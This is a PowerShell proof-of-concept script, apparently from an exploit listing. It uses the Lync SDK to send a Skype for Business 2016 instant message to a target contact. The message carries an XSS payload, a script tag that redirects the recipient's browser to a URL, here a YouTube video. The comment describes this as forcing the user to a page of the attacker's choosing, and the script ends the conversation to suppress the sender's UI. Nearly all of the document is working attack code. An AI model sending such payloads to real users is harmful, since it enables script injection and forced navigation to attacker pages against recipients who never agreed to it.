#target user $target = "user[email protected]" # For this example we will force the user to navigate to a page of our choosing (autopwn?) # Skype uses the default browser for this. $message = "PoC Skype for Business 2016 XSS Injection<script>document.location.href=('http://www.youtube.com/watch?v=9Rnr70wCQSA')</script>" if (-not (Get-Module -Name Microsoft.Lync.Model)) { try { # you may need to change the location of this DLL Import-Module "C:/Program Files/Microsoft Office/Office15/LyncSDK/Assemblies/Desktop/Microsoft.Lync.Model.dll" -ErrorAction Stop } catch { Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824" } } # Connect to the local Skype process try { $client = [Microsoft.Lync.Model.LyncClient]::GetClient() } catch { Write-Host "`nMust be signed-in to Skype" break } #Start Conversation $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]" #Add the Message $msg.Add(1,$message) # Add the contact URI try { $contact = $client.ContactManager.GetContactByUri($target) } catch { Write-Host "`nFailed to lookup Contact"$target break } # Create a conversation $convo = $client.ConversationManager.AddConversation() $convo.AddParticipant($contact) | Out-Null # Set the message mode as IM $imModality = $convo.Modalities[1] # Send the message $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null # End the Convo to suppress the UI $convo.End() | Out-Null Write-Host "Sent the following message to "$target":`n"$message
评论